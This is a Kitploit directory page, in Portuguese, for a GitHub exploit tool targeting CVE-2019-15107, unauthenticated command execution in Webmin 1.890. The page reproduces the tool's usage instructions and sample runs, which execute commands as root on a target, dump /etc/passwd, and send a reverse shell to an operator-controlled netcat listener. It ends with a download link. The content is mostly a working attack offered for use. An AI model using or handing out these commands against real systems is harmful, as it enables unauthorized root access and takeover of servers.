Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
CVE-2019-15107 — CVE-2019-15107 Webmin RCE não autenticado | Kitploit
Ferramentas/GitHubGitHub/nasrallahbaadi/cve-2019-15107
Análise de VulnerabilidadesExploraçãoExploração de Aplicações WebTestes de PenetraçãoComando e ControleFerramenta de Acesso Remoto
GitHubnasrallahbaadi/cve-2019-15107

CVE-2019-15107

CVE-2019-15107 Webmin RCE não autenticado

Ver Repositório
32há 2 anosAinda não revisado

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

CVE-2019-15107 Execução Remota de Código Não Autenticada no Webmin 1.890

Este script foi projetado para explorar a vulnerabilidade de execução de comandos não autenticada no Webmin 1.890. Ele permite executar comandos arbitrários em um servidor Webmin alvo ou obter um reverse shell.

Uso

O exploit recebe 5 argumentos:

$ python3 test.py -h                       
usage: test.py [-h] -i IP Address [-p Port number] [-c Command] [--shell] [-x]

Exploit unauthenticated command execution in Webmin 1.890.

options:
  -h, --help            show this help message and exit

required arguments:
  -i IP Address, --ip IP Address
                        Target ip address

optional arguments:
  -p Port number, --port Port number
                        Webmin port(default=10000)
  -c Command, --command Command
                        OS Command to execute (Default=id)
  --shell               Get a reverse shell
  -x, --proxy           Sends requests through Burp Suite proxy at 127.0.0.1:8080.

Example:
    python exploit.py -i 192.168.1.100
    python exploit.py -i 192.168.1.100 -p 10000 -c whoami
    python exploit.py -i 192.168.1.100 -x -c "ls -la"
    python exploit.py -i 192.168.1.100 --shell

A única opção obrigatória é -i, que é o endereço IP do alvo.

Executar o exploit apenas com -i executará o comando id em um alvo localizado na porta 10000

$ python3 exploit.py -i 10.200.105.200 
uid=0(root) gid=0(root) groups=0(root) context=system_u:system_r:initrc_t:s0

Execução de comandos

Você pode especificar qual comando executar usando as opções -c ou --command:

$ python3 exploit.py -i 10.200.105.200 -c 'cat /etc/passwd'
root:x:0:0:root:/root:/bin/bash
bin:x:1:1:bin:/bin:/sbin/nologin
daemon:x:2:2:daemon:/sbin:/sbin/nologin
adm:x:3:4:adm:/var/adm:/sbin/nologin
[...]

Reverse shell

Você também pode obter um reverse shell usando a opção --shell.

Você será solicitado a informar seu endereço IP e a porta de escuta:

$ python3 exploit.py -i 10.200.105.200 --shell 
Enter your ip address: 10.50.106.33
Enter your listening port: 9001
[+] Sending a shell to 10.50.106.33:9001...
$ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.50.106.33] from (UNKNOWN) [10.200.105.200] 41446
[root@prod-serv ]# 

Proxy

Ao adicionar a opção -x ou --proxy, você pode enviar a requisição pelo proxy burp em 127.0.0.1:8080

Referências

https://nvd.nist.gov/vuln/detail/cve-2019-15107

Baixar ferramenta